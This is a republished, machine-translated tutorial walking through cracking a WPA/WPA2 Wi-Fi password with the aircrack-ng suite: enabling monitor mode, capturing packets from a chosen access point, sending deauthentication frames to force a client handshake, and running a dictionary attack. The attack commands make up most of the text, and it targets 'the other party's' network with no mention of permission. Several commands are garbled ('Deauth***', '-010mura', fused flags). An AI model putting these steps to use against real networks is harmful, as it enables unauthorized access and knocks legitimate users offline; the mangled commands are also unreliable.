Shulou(Shulou.com)06/01 Report--

Disclaimer: this article refers to a lot of information on the Internet, plus a summary of the actual operation of my own one-night struggle.

Among them, http://netsecurity.51cto.com/art/201105/264844_all.htm article is written in more detail, which can be used as a reference.

1. Check the status of the wireless card and activate the wireless card

Ifconfig

Ifconfig wlan0 up

two。 Activate the wireless network card to monitor listening mode

Airmon-ng start wlan0

3. Detect wireless networks and grab wireless packets

Before formally grabbing the packet, we usually carry out pre-detection to get the current wireless network overview, including AP's SSID, MAC address, working channel, wireless client MAC and number, and so on.

Note: the client here refers to the client of the wireless AP, not the cracked host

Airodump-ng mon0

Note: the BSSID here is AP, the mac,STATION is the mac of the client.

The goal of finding the crack is to choose the top AP with data (data) as far as possible, write down the mac of AP and STATION here, and the channel (CH).

BSSID STATION CH

C8:3A:35:2D:5E:78 88:E3:AB:C3:A6:0F 7

Airodump-ng-c 7-w abc--bssid C8:3A:35:2D:5E:78 mon0

# grab the data packet for the AP and write it to the abc file

-c: the wireless channel of the AP

-w: indicates the file to be written

-- mac address of bssid:AP

4. Speed up the cracking process of Deauth***.

If the window above is not closed, let it continue to grab the package, and then reopen the second window to accelerate the cracking process of Deauth***.

Aireplay-ng-0 1-aC8:3A:35:2D:5E:78-c 88:E3:AB:C3:A6:0F mon0

The following error may occur after running

When prompted, modify the command as follows:

Aireplay-ng--ignore-negative-one-0 1-a C8:3A:35:2D:5E:78-c 88:E3:AB:C3:A6:0F mon0

You can see that the error is no longer reported, but the identification part [0 | 31ACKS] indicates that there is no data reply, so you need to repeat this step until there is a data reply and a handshake package appears in the first window before you can proceed to the next step. You can increase the number here.

Aireplay-ng--ignore-negative-one-010mura C8:3A:35:2D:5E:78-c 88:E3:AB:C3:A6:0F mon0

Note: reply data appears here

And the handshake package appeared in the first window where the packet data was grabbed. Because the handshake package flashed by, you need to pay attention to the first window for Deauth*** in the second window (I am here on the screenshot, but it is difficult to take a screenshot and flash by)

5. After completing the key step above, the next step is the exciting cracking step. WAP/WAP2 needs a dictionary to crack. Please download the dictionary in advance and put it on the cracking system.

Aircrack-ng-w beini.txt abc*.cap

-w: the cracked password dictionary

Abc*.cap crawls packets for the first window

The next step is to sit back and wait for the results. Can you successfully see whether your dictionary is good or bad, the difficulty coefficient of the AP password of the other party, the cracking speed of the computer, and a little bit of luck?

Note: I don't know why I can't copy the screenshot. Please see the attachment for details.

Attachment: http://down.51cto.com/data/2365717

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.